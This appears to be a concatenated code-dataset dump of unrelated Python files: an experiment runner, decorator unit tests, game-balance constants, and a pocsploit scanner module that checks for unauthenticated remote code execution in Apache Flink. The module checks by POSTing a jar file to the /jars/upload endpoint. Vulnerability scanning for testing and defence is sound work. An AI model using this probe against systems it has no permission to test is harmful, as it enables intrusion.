] | 106 | 2022-03-18T06:51:09.000Z | 2022-03-31T19:11:41.000Z | modules/vulnerabilities/apache/apache-flink-unauth-rce.py | cckuailong/pocsploit | fe4a3154e59d2bebd55ccfdf62f4f7efb21b5a2a | [
"MIT"
] | 5 | 2022-03-27T07:37:32.000Z | 2022-03-31T13:56:11.000Z | modules/vulnerabilities/apache/apache-flink-unauth-rce.py | cckuailong/pocsploit | fe4a3154e59d2bebd55ccfdf62f4f7efb21b5a2a | [
"MIT"
] | 30 | 2022-03-21T01:27:08.000Z | 2022-03-31T12:28:01.000Z | import requests
# Vuln Base Info
def info():
    """Metadata describing the Apache Flink unauthenticated RCE check."""
    references = [
        "https://www.exploit-db.com/exploits/48978",
        "https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3",
        "https://github.com/LandGrey/flink-unauth-rce",
    ]
    classification = {
        "cvss-metrics": "",
        "cvss-score": "",
        "cve-id": "",
        "cwe-id": "",
    }
    return {
        "author": "cckuailong",
        "name": '''Apache Flink Unauth RCE''',
        "description": '''''',
        "severity": "critical",
        "references": references,
        "classification": classification,
        "metadata": {
            "vuln-target": "",
        },
        "tags": ["apache", "flink", "rce", "intrusive", "unauth"],
    }
# Vender Fingerprint
def fingerprint(url):
    """Vendor fingerprint gate; always True (no Flink-specific probe here)."""
    return True
# Proof of Concept
def poc(url):
    """Probe Flink's unauthenticated /jars/upload endpoint with a jar upload.

    Returns a dict always containing "success"; on success it also carries
    "info" (vulnerability metadata) and "payload" (the targeted URL).
    """
    # Bug fix: initialize "success" up front so callers never hit a KeyError
    # when the response checks below do not match (the old code left the
    # dict empty in that case).
    result = {"success": False}
    try:
        url = format_url(url)
        path = """/jars/upload"""
        method = "POST"
        # Raw multipart body; {{randstr}} is the scanner's template placeholder.
        data = """--8ce4b16b22b58894aa86c421e8759df3
Content-Disposition: form-data; name="jarfile";filename="poc.jar"
Content-Type:application/octet-stream
{{randstr}}
--8ce4b16b22b58894aa86c421e8759df3--"""
        headers = {'Content-Type': 'multipart/form-data;boundary=8ce4b16b22b58894aa86c421e8759df3'}
        resp0 = requests.request(method=method, url=url + path, data=data, headers=headers,
                                 timeout=10, verify=False, allow_redirects=False)
        if (resp0.status_code == 200
                and """application/json""" in str(resp0.headers)
                and """success""" in resp0.text
                and """_poc.jar""" in resp0.text):
            result["success"] = True
            result["info"] = info()
            result["payload"] = url + path
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
        # still propagate; any request/parse failure means "not vulnerable".
        result["success"] = False
    return result
# Exploit, can be same with poc()
def exp(url):
    """Exploit entry point; identical to the proof-of-concept check."""
    return poc(url)
# Utils
def format_url(url):
    """Normalize a target URL: trim whitespace, ensure a scheme, drop trailing slashes."""
    cleaned = url.strip()
    has_scheme = cleaned.startswith('http://') or cleaned.startswith('https://')
    if not has_scheme:
        cleaned = 'http://' + cleaned
    return cleaned.rstrip('/')
87680095c411796de2122adf5dd6e5fdfea46b57 | 6,506 | py | Python | runner.py | RokoMijic/ExperimentRunner | db3a7a4d6fb94a5e04d6e036eb3093d0d6585882 | [
"MIT"
] | 1 | 2020-06-05T14:10:35.000Z | 2020-06-05T14:10:35.000Z | runner.py | RokoMijic/ExperimentRunner | db3a7a4d6fb94a5e04d6e036eb3093d0d6585882 | [
"MIT"
] | null | null | null | runner.py | RokoMijic/ExperimentRunner | db3a7a4d6fb94a5e04d6e036eb3093d0d6585882 | [
"MIT"
] | null | null | null | import joblib
from joblib import Parallel, delayed
from joblib import parallel_backend
import contextlib
from tqdm import tqdm
from itertools import product
from functools import cmp_to_key
from more_itertools import unique_everseen
import pandas as pd
import random
import time
@contextlib.contextmanager
def tqdm_joblib(tqdm_object):
    """Context manager to patch joblib to report into tqdm progress bar given as argument"""
    class TqdmBatchCompletionCallback:
        # Stand-in for joblib's BatchCompletionCallBack; keeps the same
        # (time, index, parallel) constructor signature joblib expects.
        def __init__(self, time, index, parallel):
            self.index = index
            self.parallel = parallel

        def __call__(self, index):
            # NOTE(review): update() with no argument advances the bar by 1
            # per completed *batch*, not per task — fine for batch_size=1.
            tqdm_object.update()
            if self.parallel._original_iterator is not None:
                # Mirror the stock callback: keep feeding joblib more batches.
                self.parallel.dispatch_next()

    # Swap in the patched callback for the duration of the `with` block.
    old_batch_callback = joblib.parallel.BatchCompletionCallBack
    joblib.parallel.BatchCompletionCallBack = TqdmBatchCompletionCallback
    try:
        yield tqdm_object
    finally:
        # Always restore joblib's original callback and close the bar, even
        # if the body raised.
        joblib.parallel.BatchCompletionCallBack = old_batch_callback
        tqdm_object.close()
def results_to_df(experirunner_res):
    """Flatten experiment results into a pandas DataFrame.

    Each row merges the experiment's setting (minus the nested 'hparams'
    dict), the hyperparameters themselves, and the result metrics.
    """
    rows = []
    for res in experirunner_res:
        setting = res['setting']
        row = {key: value for key, value in setting.items() if key != 'hparams'}
        row.update(setting['hparams'])
        row.update(res['result'])
        rows.append(row)
    return pd.DataFrame(rows)
def experiment_fn(dataset, algorithm, hparams, metrics_dict):
    """Run one experiment: apply `algorithm` to `dataset` with the given
    hyperparameters, forwarding `metrics_dict` for evaluation."""
    return algorithm(dataset=dataset, metrics_dict=metrics_dict, **hparams)
def run_experiments(algo_dict, dataset_dict, metrics_dict, hyperp_dict, n_jobs=16, rchoice_hparam = -1, rchoice_tot = -1, verbose=True, is_sorted='asc', backend_name='loky', ret_df=True):
    '''
    Runs experiments in parallel using joblib.

    Experiments are the cartesian product of datasets, algorithms and
    hyperparameter settings; each one is executed by the module-level
    `experiment_fn`.

    PARAMETERS

    algo_dict      : Dictionary of algorithms (name -> callable)
    dataset_dict   : Dictionary of datasets (name -> dataset object)
    metrics_dict   : Dictionary of metrics (name -> metric callable)
    hyperp_dict    : Dictionary of hyperparams (name -> list of values to sweep)
    n_jobs         : max number of processes to spawn, default 16
    rchoice_hparam : randomly choose up to this many hyperparameter sets.
                     Default is -1, which indicates using all sets of hyperparameters to make experiments
    rchoice_tot    : randomly choose up to this many experiments to run.
                     Default is -1, which indicates running all experiments
    verbose        : verbosity
    is_sorted      : sort results by the first metric given. Possible values: False, 'asc', 'desc'.
                     NOTE(review): the comparator sorts ascending for 'asc' (the default) and
                     descending for 'desc'; an earlier docstring described 'asc' as descending —
                     confirm the intended direction.
    backend_name   : joblib backend to use, default 'loky'
    ret_df         : if True (default) return a flattened pandas DataFrame,
                     otherwise a list of {'setting': ..., 'result': ...} dicts

    Each algorithm is expected to have roughly this signature, though it will
    vary depending on how the metric is computed:

        def algorithm(dataset, metrics_dict, **hparams):
            result = ...
            return {n: m(result) for n, m in metrics_dict.items()}
    '''

    # Get a list of all possible hyperparameter settings
    hyperp_settings_list = [ dict( zip( hyperp_dict.keys() , hparam_tuple ) ) for hparam_tuple in product(*hyperp_dict.values() ) ]

    # Optionally subsample the hyperparameter grid
    if 0 < rchoice_hparam < len(hyperp_settings_list) : hyperp_settings_list = random.sample(hyperp_settings_list, rchoice_hparam)

    # Get a list of all possible experiments (dataset x algorithm x hyperparameter setting)
    experi_names_list = [ dict( zip( ['dataset', 'algorithm', 'hparams'] , exp_tuple ) )
                         for exp_tuple in product( dataset_dict.keys(), algo_dict.keys(), hyperp_settings_list ) ]

    # Here we remove hyperparameter names/values if the algorithm being used doesn't have them as parameters.
    # This inspects the algorithm's code object, so it assumes plain Python functions.
    for experi_name in experi_names_list:
        required_hparams_this_experiment = algo_dict[experi_name['algorithm']].__code__.co_varnames
        filtered_hparams_this_experiment = {hpname:hpval for (hpname, hpval) in experi_name['hparams'].items() if hpname in required_hparams_this_experiment }
        experi_name['hparams'] = filtered_hparams_this_experiment

    # remove duplicate experiments that have been created by dropping unneeded hyperparameters
    experi_names_list = list(unique_everseen(experi_names_list))

    # Optionally subsample the full experiment list
    if 0 < rchoice_tot < len(experi_names_list) : experi_names_list = random.sample(experi_names_list, rchoice_tot)

    # if verbose: print( f"Running {len(experi_names_list)} experiments" )

    # convert the names into actual objects for experiments
    experi_settings_list = [ { 'dataset' : dataset_dict[setting_n['dataset']] ,
                               'algorithm' : algo_dict[setting_n['algorithm']] ,
                               'hparams' : setting_n['hparams'] ,
                               'metrics_dict' : metrics_dict }
                             for setting_n in experi_names_list ]

    start_t = time.time()

    ##################################################################################################################
    # run all the experiments in parallel with joblib, with a tqdm progress bar patched in
    with parallel_backend(backend_name, n_jobs=n_jobs):
        with tqdm_joblib(tqdm(desc=f"Running {len(experi_names_list)} experiments", total=len(experi_settings_list), position=0, leave=True )) as progress_bar:
            results = Parallel(n_jobs=n_jobs)(delayed(experiment_fn)(**setting) for setting in experi_settings_list)
    ##################################################################################################################

    end_t = time.time()

    if verbose: print("\n%.2f seconds elapsed \n" % (end_t - start_t) )

    # pair every result with the (name-level) setting that produced it;
    # Parallel preserves input order, so zip is aligned
    results_w_settings_list = [ {'setting': s, 'result' : r} for s, r in zip(experi_names_list, results) ]

    # sort by the first metric; the comparator assumes metric values support subtraction
    if is_sorted == 'asc' or is_sorted == 'desc':
        first_metric = list(metrics_dict.keys())[0]
        def compare_fn(item1, item2):
            return (-1 if is_sorted == 'desc' else 1)*(item1['result'][first_metric] - item2['result'][first_metric] )
        results_w_settings_list = sorted(results_w_settings_list , key=cmp_to_key(compare_fn))

    if ret_df:
        return results_to_df(results_w_settings_list)
    else:
        return results_w_settings_list
| 45.180556 | 187 | 0.626806 | 750 | 6,506 | 5.193333 | 0.274667 | 0.040051 | 0.042362 | 0.025674 | 0.080616 | 0.068293 | 0.044159 | 0.02516 | 0 | 0 | 0 | 0.003968 | 0.264064 | 6,506 | 143 | 188 | 45.496504 | 0.809524 | 0.27467 | 0 | 0 | 0 | 0 | 0.057287 | 0.0055 | 0 | 0 | 0 | 0 | 0 | 1 | 0.107692 | false | 0 | 0.169231 | 0.030769 | 0.369231 | 0.015385 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
876b4a85a4bf452833f0afedb2e9e840f2ad8a96 | 8,054 | py | Python | tests/decorators/test_ready_to_wear.py | Kilerd/pydecor | 2a6169150a0a9b6a41fd88a6cb6885520d71e115 | [
"MIT"
] | 29 | 2017-06-13T13:58:06.000Z | 2022-01-18T05:24:28.000Z | tests/decorators/test_ready_to_wear.py | Kilerd/pydecor | 2a6169150a0a9b6a41fd88a6cb6885520d71e115 | [
"MIT"
] | 18 | 2017-09-04T04:43:12.000Z | 2021-05-17T06:32:07.000Z | tests/decorators/test_ready_to_wear.py | Kilerd/pydecor | 2a6169150a0a9b6a41fd88a6cb6885520d71e115 | [
"MIT"
] | 5 | 2019-12-27T01:17:38.000Z | 2020-11-10T06:30:47.000Z | """Test ready-to-use decorators."""
import typing as t
from logging import getLogger
from time import sleep
from unittest.mock import Mock, call
import pytest
from pydecor.caches import FIFOCache, LRUCache, TimedCache
from pydecor.constants import LOG_CALL_FMT_STR
from pydecor.decorators import (
log_call,
intercept,
memoize,
)
@pytest.mark.parametrize(
    "raises, catch, reraise, include_handler",
    [
        (Exception, Exception, ValueError, False),
        (Exception, Exception, ValueError, True),
        (Exception, Exception, True, True),
        (Exception, Exception, True, False),
        (None, Exception, ValueError, False),
        (None, Exception, ValueError, True),
        (Exception, Exception, None, False),
        (Exception, Exception, None, True),
        (Exception, RuntimeError, ValueError, False),  # won't catch
        (Exception, RuntimeError, ValueError, True),  # won't catch
    ],
)
def test_intercept(raises, catch, reraise, include_handler):
    """Test the intercept decorator.

    Parametrized over:
        raises          : exception type raised by the wrapped callable, or None
        catch           : exception type `intercept` is told to catch
        reraise         : True to re-raise the original exception, an exception
                          type to re-raise as, or None to swallow
        include_handler : whether a handler callable is passed to `intercept`
    """
    wrapped = Mock()
    wrapped.__name__ = str("wrapped")
    if raises is not None:
        wrapped.side_effect = raises
    handler = Mock(name="handler") if include_handler else None
    if handler is not None:
        handler.__name__ = str("handler")
    fn = intercept(catch=catch, reraise=reraise, handler=handler)(wrapped)
    # only exceptions that are subclasses of `catch` are intercepted
    will_catch = raises and issubclass(raises, catch)
    if reraise and will_catch:
        # reraise=True re-raises the original type; a type re-raises as that type
        to_be_raised = raises if reraise is True else reraise
        with pytest.raises(to_be_raised):
            fn()
    elif raises and not will_catch:
        # uncaught exceptions propagate unchanged
        with pytest.raises(raises):
            fn()
    else:
        fn()
    if handler is not None and will_catch:
        # the handler receives the caught exception instance as its only argument
        # pylint: disable=unsubscriptable-object
        called_with = handler.call_args[0][0]
        # pylint: enable=unsubscriptable-object
        assert isinstance(called_with, raises)
    if handler is not None and not will_catch:
        handler.assert_not_called()
    # the wrapped callable is always invoked exactly once, with no arguments
    wrapped.assert_called_once_with(*(), **{})  # type: ignore
def test_intercept_method():
    """Test decorating an instance method with intercept."""
    caught = []

    def _handler(exc):
        caught.append(exc)

    class SomeClass:
        @intercept(handler=_handler)
        def it_raises(self, val):
            raise ValueError(val)

    instance = SomeClass()
    instance.it_raises("a")

    # the raised exception was routed to the handler exactly once
    assert len(caught) == 1
    assert isinstance(caught[0], ValueError)
def test_log_call():
    """Test the log_call decorator"""
    logger = getLogger(__name__)
    logger.debug = Mock()  # type: ignore

    @log_call(level="debug")
    def func(*args, **kwargs):
        return "foo"

    passed_args = ("a",)
    passed_kwargs = {"b": "c"}
    result = func(*passed_args, **passed_kwargs)

    # the decorator logs one message built from the standard format string
    expected = LOG_CALL_FMT_STR.format(
        name="func", args=passed_args, kwargs=passed_kwargs, result=result
    )
    logger.debug.assert_called_once_with(expected)
class TestMemoization:
    """Tests for memoization"""

    # (args, kwargs) pairs covering hashable and unhashable argument types
    memoizable_calls: t.Tuple[t.Tuple, ...] = (
        (("a", "b"), {"c": "d"}),
        ((["a", "b", "c"],), {"c": "d"}),
        ((lambda x: "foo",), {"c": lambda y: "bar"}),
        (({"a": "a"},), {"c": "d"}),
        ((type(str("A"), (object,), {})(),), {}),
        ((), {}),
        ((1, 2, 3), {}),
    )

    @pytest.mark.parametrize("args, kwargs", memoizable_calls)
    def test_memoize_basic(self, args, kwargs):
        """Test basic use of the memoize decorator"""
        tracker = Mock(return_value="foo")

        @memoize()
        def func(*args, **kwargs):
            return tracker(args, kwargs)

        # first call computes and caches
        assert func(*args, **kwargs) == "foo"
        tracker.assert_called_once_with(args, kwargs)
        # second identical call is served from the cache
        assert func(*args, **kwargs) == "foo"
        assert len(tracker.mock_calls) == 1

    def test_memoize_lru(self):
        """Test removal of least-recently-used items"""
        call_list = tuple(range(5))  # 0-4
        tracker = Mock()

        @memoize(keep=5, cache_class=LRUCache)
        def func(val):
            tracker(val)
            return val

        for val in call_list:
            func(val)
        # LRU: 0 1 2 3 4
        assert len(tracker.mock_calls) == len(call_list)
        for val in call_list:
            assert call(val) in tracker.mock_calls
        # call with all the same args
        for val in call_list:
            func(val)
        # no new calls, lru order should be same
        # LRU: 0 1 2 3 4
        assert len(tracker.mock_calls) == len(call_list)
        for val in call_list:
            assert call(val) in tracker.mock_calls
        # add new value, popping least-recently-used (0)
        # LRU: 1 2 3 4 5
        func(5)
        assert len(tracker.mock_calls) == len(call_list) + 1
        assert tracker.mock_calls[-1] == call(5)  # most recent call
        # Re-call with 0, asserting that we call the func again,
        # and dropping 1
        # LRU: 2 3 4 5 0
        func(0)
        assert len(tracker.mock_calls) == len(call_list) + 2
        assert tracker.mock_calls[-1] == call(0)  # most recent call
        # Let's ensure that using something rearranges it
        func(2)
        # LRU: 3 4 5 0 2
        # no new calls
        assert len(tracker.mock_calls) == len(call_list) + 2
        assert tracker.mock_calls[-1] == call(0)  # most recent call
        # Let's put another new value into the cache
        func(6)
        # LRU: 4 5 0 2 6
        assert len(tracker.mock_calls) == len(call_list) + 3
        assert tracker.mock_calls[-1] == call(6)
        # Assert that 2 hasn't been dropped from the list, like it
        # would have been if we hadn't called it before 6
        func(2)
        # LRU: 4 5 0 6 2
        assert len(tracker.mock_calls) == len(call_list) + 3
        assert tracker.mock_calls[-1] == call(6)

    def test_memoize_fifo(self):
        """Test using the FIFO cache"""
        call_list = tuple(range(5))  # 0-4
        tracker = Mock()

        @memoize(keep=5, cache_class=FIFOCache)
        def func(val):
            tracker(val)
            return val

        for val in call_list:
            func(val)
        # Cache: 0 1 2 3 4
        assert len(tracker.mock_calls) == len(call_list)
        for val in call_list:
            assert call(val) in tracker.mock_calls
        # call with all the same args
        for val in call_list:
            func(val)
        # no new calls, cache still the same
        # Cache: 0 1 2 3 4
        assert len(tracker.mock_calls) == len(call_list)
        for val in call_list:
            assert call(val) in tracker.mock_calls
        # add new value, popping first in (0)
        # Cache: 1 2 3 4 5
        func(5)
        assert len(tracker.mock_calls) == len(call_list) + 1
        assert tracker.mock_calls[-1] == call(5)  # most recent call
        # Assert 5 doesn't yield a new call
        func(5)
        assert len(tracker.mock_calls) == len(call_list) + 1
        assert tracker.mock_calls[-1] == call(5)  # most recent call
        # Re-call with 0, asserting that we call the func again,
        # and dropping 1
        # Cache: 2 3 4 5 0
        func(0)
        assert len(tracker.mock_calls) == len(call_list) + 2
        assert tracker.mock_calls[-1] == call(0)  # most recent call
        # Assert neither 0 nor 5 yield new calls
        func(0)
        func(5)
        assert len(tracker.mock_calls) == len(call_list) + 2
        assert tracker.mock_calls[-1] == call(0)  # most recent call

    def test_memoization_timed(self):
        """Test timed memoization"""
        time = 0.005
        tracker = Mock()

        @memoize(keep=time, cache_class=TimedCache)
        def func(val):
            tracker(val)
            return val

        # within the keep window, the cached value is reused
        assert func(1) == 1
        assert tracker.mock_calls == [call(1)]
        assert func(1) == 1
        assert tracker.mock_calls == [call(1)]
        # after the entry expires, the function is invoked again
        sleep(time)
        assert func(1) == 1
        assert tracker.mock_calls == [call(1), call(1)]
| 29.610294 | 74 | 0.586913 | 1,072 | 8,054 | 4.281716 | 0.166045 | 0.081481 | 0.104575 | 0.061002 | 0.449673 | 0.398475 | 0.389325 | 0.368627 | 0.368627 | 0.368627 | 0 | 0.02344 | 0.295505 | 8,054 | 271 | 75 | 29.719557 | 0.785513 | 0.169853 | 0 | 0.424419 | 0 | 0 | 0.017887 | 0 | 0 | 0 | 0 | 0 | 0.244186 | 1 | 0.081395 | false | 0 | 0.046512 | 0.011628 | 0.174419 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
876bb31792d5bda715bba9f6833569c6590f7aa2 | 33,973 | py | Python | src/the_tale/the_tale/game/balance/constants.py | SilentWrangler/the-tale | a121128edd2a9e36133eb047946ccb9593801ea6 | [
"BSD-3-Clause"
] | null | null | null | src/the_tale/the_tale/game/balance/constants.py | SilentWrangler/the-tale | a121128edd2a9e36133eb047946ccb9593801ea6 | [
"BSD-3-Clause"
] | null | null | null | src/the_tale/the_tale/game/balance/constants.py | SilentWrangler/the-tale | a121128edd2a9e36133eb047946ccb9593801ea6 | [
"BSD-3-Clause"
] | null | null | null |
import smart_imports
smart_imports.all()
TIME_TO_LVL_DELTA: float = 7  # time difference between gaining two adjacent levels
TIME_TO_LVL_MULTIPLIER: float = 1.02  # experience multiplier, raised to the power of the level
INITIAL_HP: int = 500  # hero's starting health
HP_PER_LVL: int = 50  # health bonus per level
MOB_HP_MULTIPLIER: float = 0.25  # fraction of the hero's health that an average mob's health represents
BOSS_HP_MULTIPLIER: float = 0.5  # fraction of the hero's health that a boss's health represents
TURN_DELTA: int = 10  # delay of a single turn, in seconds
TURNS_IN_HOUR: float = 60.0 * 60 / TURN_DELTA  # number of turns in 1 hour
POWER_PER_LVL: int = 1  # the hero's "pure" power (i.e. without artifacts)
EQUIP_SLOTS_NUMBER: int = 11  # number of equipment slots
# We take the rate of obtaining artifacts from loot as the artifact acquisition rate;
# the other acquisition channels (purchase, quests) are treated as fluctuations.
ARTIFACTS_LOOT_PER_DAY: float = 2.0  # number of new artifacts per real day
ARTIFACT_FOR_QUEST_PROBABILITY: float = 0.2  # probability of receiving an artifact as a quest reward
# Shares of loot and artifacts in the hero's income. Quest rewards are counted as artifacts.
INCOME_LOOT_FRACTION: float = 0.6
INCOME_ARTIFACTS_FRACTION: float = 1.0 - INCOME_LOOT_FRACTION
# magic number — the expected number of quests a hero completes per day
EXPECTED_QUESTS_IN_DAY: float = 2.0
# number of artifact breakages per day, chosen so that in the ideal case the whole equipment set is renewed in 3 weeks
ARTIFACTS_BREAKING_SPEED: float = EQUIP_SLOTS_NUMBER / (3 * 7.0)
EQUIPMENT_BREAK_FRACTION: float = 0.5  # fraction of equipped artifacts that are allowed to break
NORMAL_SLOT_REPAIR_PRIORITY: float = 1.0  # repair priority of an ordinary slot
SPECIAL_SLOT_REPAIR_PRIORITY: float = 2.0  # repair priority of a slot from the hero's preferences
EXP_PER_HOUR: int = 10  # experience per hour
EXP_PER_QUEST_FRACTION: float = 0.33  # spread of experience awarded per quest
COMPANIONS_BONUS_EXP_FRACTION: float = 0.2  # share of bonus experience that companions can contribute
# with possible abilities taken into account (i.e. with the right abilities a premium account's experience rate is 1.0)
EXP_FOR_PREMIUM_ACCOUNT: float = 1.0  # experience modifier for premium accounts
EXP_FOR_NORMAL_ACCOUNT: float = 0.66  # experience modifier for regular accounts
# TODO: bring EXP_FOR_PREMIUM_ACCOUNT to 1.0 (the difference with a regular account should be 50%)
# can't be done right now because it would be too noticeable
HERO_MOVE_SPEED: float = 0.1  # hero's base speed, distance per turn
BATTLE_LENGTH: int = 16  # turns — average duration of one battle (number of actions per battle)
INTERVAL_BETWEEN_BATTLES: int = 3  # turns — time between two battles
BATTLES_BEFORE_HEAL: int = 8  # number of battles in an uninterrupted battle chain
MOVE_TURNS_IN_ACTION_CYCLE: int = INTERVAL_BETWEEN_BATTLES * BATTLES_BEFORE_HEAL
DISTANCE_IN_ACTION_CYCLE: float = HERO_MOVE_SPEED * MOVE_TURNS_IN_ACTION_CYCLE
HEAL_TIME_FRACTION: float = 0.2  # fraction of the battle-chain time spent on fully healing the hero
HEAL_STEP_FRACTION: float = 0.2  # spread of regeneration per turn
HEALTH_IN_SETTLEMENT_TO_START_HEAL_FRACTION: float = 0.33  # if the hero's health is below this fraction while in a city, he starts healing
HEALTH_IN_MOVE_TO_START_HEAL_FRACTION: float = 2 * (1.0 / BATTLES_BEFORE_HEAL)  # if the hero's health is below this fraction while travelling, he starts healing
TURNS_TO_IDLE: int = 6  # number of turns per level that the hero idles in the corresponding action
TURNS_TO_RESURRECT: int = TURNS_TO_IDLE * 3  # number of turns per level required for resurrection
GET_LOOT_PROBABILITY: float = 0.50  # probability of getting loot after a battle when no artifact dropped
# probabilities of getting the different kinds of loot
EPIC_ARTIFACT_PROBABILITY: float = 0.005
RARE_ARTIFACT_PROBABILITY: float = 0.05
NORMAL_ARTIFACT_PROBABILITY: float = 1 - RARE_ARTIFACT_PROBABILITY - EPIC_ARTIFACT_PROBABILITY
NORMAL_LOOT_COST: float = 1  # loot value per unit of level
MAX_BAG_SIZE: int = 12  # maximum size of the hero's bag
BAG_SIZE_TO_SELL_LOOT_FRACTION: float = 0.33  # bag fullness fraction after which the hero starts selling items
# relative sizes of the various kinds of spending
BASE_EXPERIENCE_FOR_MONEY_SPEND: int = int(24 * EXP_PER_HOUR * 0.4)
EXPERIENCE_DELTA_FOR_MONEY_SPEND: float = 0.5
POWER_TO_LVL: float = EQUIP_SLOTS_NUMBER  # expected power bonus per hero level
# The spread of artifact power goes from -ArtifactPowerDelta to +ArtifactPowerDelta.
# It is based on the number of slots, so in theory there may be no items with duplicate power.
# To avoid imbalance, the delta must shrink at low levels so that the difference
# between the item level and the delta is at least one.
ARTIFACT_POWER_DELTA: float = 0.2  # delta by which an artifact's power may vary
ARTIFACT_BETTER_MIN_POWER_DELTA: int = 5  # minimum delta by which a "better" artifact's power may differ (for the shop)
# turns — length of the uninterrupted battle chain before stopping to heal
BATTLES_LINE_LENGTH: int = BATTLES_BEFORE_HEAL * (BATTLE_LENGTH + INTERVAL_BETWEEN_BATTLES) - INTERVAL_BETWEEN_BATTLES
# number of battles per turn within a stretch of continuous battles
BATTLES_PER_TURN: float = 1.0 / (INTERVAL_BETWEEN_BATTLES + 1)
WHILD_BATTLES_PER_TURN_BONUS: float = 0.05
# maximum allowed value of the battle probability
MAX_BATTLES_PER_TURN: float = 0.9
COMPANIONS_DEFENDS_IN_BATTLE: float = 1.5  # average number of times an average companion "defends" the hero per battle
COMPANIONS_HEAL_FRACTION: float = 0.05  # share of companion-care actions (for a companion with average health) among all hero actions
HEAL_LENGTH: int = math.floor(BATTLES_LINE_LENGTH * HEAL_TIME_FRACTION)  # turns — duration of the hero's healing
ACTIONS_CYCLE_LENGTH: int = math.ceil((BATTLES_LINE_LENGTH + HEAL_LENGTH) / (1 - COMPANIONS_HEAL_FRACTION))  # turns — length of one "game cycle": battle chain + heal
MOVE_TURNS_IN_HOUR: float = MOVE_TURNS_IN_ACTION_CYCLE * (ACTIONS_CYCLE_LENGTH * TURN_DELTA / float(60 * 60))
# approximate number of battles occurring per hour of game time
BATTLES_PER_HOUR: float = TURNS_IN_HOUR * (float(BATTLES_BEFORE_HEAL) / ACTIONS_CYCLE_LENGTH)
# probability of an artifact dropping from a mob (i.e. probability of getting an artifact after a battle)
ARTIFACTS_PER_BATTLE: float = ARTIFACTS_LOOT_PER_DAY / (BATTLES_PER_HOUR * 24)
# probability of breaking an artifact after a battle
ARTIFACTS_BREAKS_PER_BATTLE: float = ARTIFACTS_BREAKING_SPEED / (BATTLES_PER_HOUR * 24)
ARTIFACT_FROM_PREFERED_SLOT_PROBABILITY: float = 0.25  # probability of picking an artifact from the preferred slot for purchase/upgrade
ARTIFACT_INTEGRITY_DAMAGE_PER_BATTLE: int = 1  # artifact integrity lost per battle
ARTIFACT_INTEGRITY_DAMAGE_FOR_FAVORITE_ITEM: float = 0.5  # integrity-damage modifier for the hero's favorite item
_INTEGRITY_LOST_IN_DAY = BATTLES_PER_HOUR * 24 * ARTIFACT_INTEGRITY_DAMAGE_PER_BATTLE  # helper: integrity lost over one day of battles
ARTIFACT_RARE_MAX_INTEGRITY_MULTIPLIER: float = 1.5  # maximum-integrity multiplier for rare artifacts
ARTIFACT_EPIC_MAX_INTEGRITY_MULTIPLIER: float = 2  # maximum-integrity multiplier for epic artifacts
ARTIFACT_MAX_INTEGRITY_DELTA: float = 0.25  # allowed spread of the maximum integrity
ARTIFACT_MAX_INTEGRITY: int = int(round(_INTEGRITY_LOST_IN_DAY * 30, -3))  # maximum integrity of an ordinary artifact
ARTIFACT_SHARP_MAX_INTEGRITY_LOST_FRACTION: float = 0.04  # fraction of the maximum integrity lost when sharpening
ARTIFACT_INTEGRITY_SAFE_BARRIER: float = 0.2  # fraction of the maximum integrity; an artifact cannot break while its integrity differs from the maximum by less than this fraction
ARTIFACT_BREAK_POWER_FRACTIONS: Tuple[float, float] = (0.2, 0.3)  # how much an artifact may break at once (power)
ARTIFACT_BREAK_INTEGRITY_FRACTIONS: Tuple[float, float] = (0.1, 0.2)  # how much an artifact may break at once (integrity)
PREFERED_MOB_LOOT_PROBABILITY_MULTIPLIER: float = 2.0  # loot-probability multiplier for the hero's favorite prey
DAMAGE_TO_HERO_PER_HIT_FRACTION: float = 1.0 / (BATTLES_BEFORE_HEAL * (BATTLE_LENGTH / 2 - COMPANIONS_DEFENDS_IN_BATTLE))  # fraction of damage dealt to the hero per hit
DAMAGE_TO_MOB_PER_HIT_FRACTION: float = 1.0 / (BATTLE_LENGTH / 2)  # fraction of damage dealt to a mob per hit
DAMAGE_DELTA: float = 0.2  # damage spread: [1-DAMAGE_DELTA, 1+DAMAGE_DELTA]
DAMAGE_CRIT_MULTIPLIER: float = 2.0  # damage multiplier on a critical hit
# Thus the following mob parameters suggest themselves:
# - health, as a fraction of the average mob's — the higher it is, the longer the mob lives
# - initiative, relative to the hero's — the higher, the more often the mob acts
# - damage, as a fraction of the average mob's — the higher, the harder it hits
# - damage spread, as a fraction of the average — a purely decorative parameter, since the mean damage gets dealt in the end
# Since all parameters are measured as fractions, a mob's difficulty can be computed as hp * initiative * damage = 1 for the average mob.
# A mob with all parameters increased by 10% has difficulty 1.1^3 ~ 1.33.
# Accordingly, introducing a step of 0.1 for each parameter and scaling from 0.5 to 1.5 yields 11^3 parameter variants (and hence behaviours).
# Mob difficulty in that case varies from 0.5^3 to 1.5^3 ~ (0.125, 3.375).
#
# This raises the problem of keeping hero levelling uniform across territories — fully fair conditions would require equal mob difficulty everywhere.
# The alternative is to vary the experience granted per mob according to its difficulty; that option seems both more logical
# from the player's point of view and simpler to implement, so that is what we settle on.
#
# Calculation of other loot and gold: income/expense.
# We assume that if the hero did not get an artifact, he has a chance of getting loot.
# Loot is divided into common, rare and very rare.
# Loot is the main source of income; the gold from selling it is a function of level and rarity — i.e. three functions of level.
# Loot, like mobs, is organised as a list sorted by the level at which it becomes available;
# this lets us open new content to players and also spread the prices.

##########################
# assorted "stray" constants
##########################
DESTINY_POINT_IN_LEVELS: int = 5  # grant an ability point every this many levels
SPEND_MONEY_FOR_HEAL_HEALTH_FRACTION: float = 0.75  # the hero spends money on healing when his health is below this fraction

##########################
# angel parameters
##########################
ANGEL_ENERGY_REGENERATION_TIME: float = 0.5  # regenerate once every this many hours
ANGEL_ENERGY_REGENERATION_AMAUNT: int = 1  # how much energy is restored each time
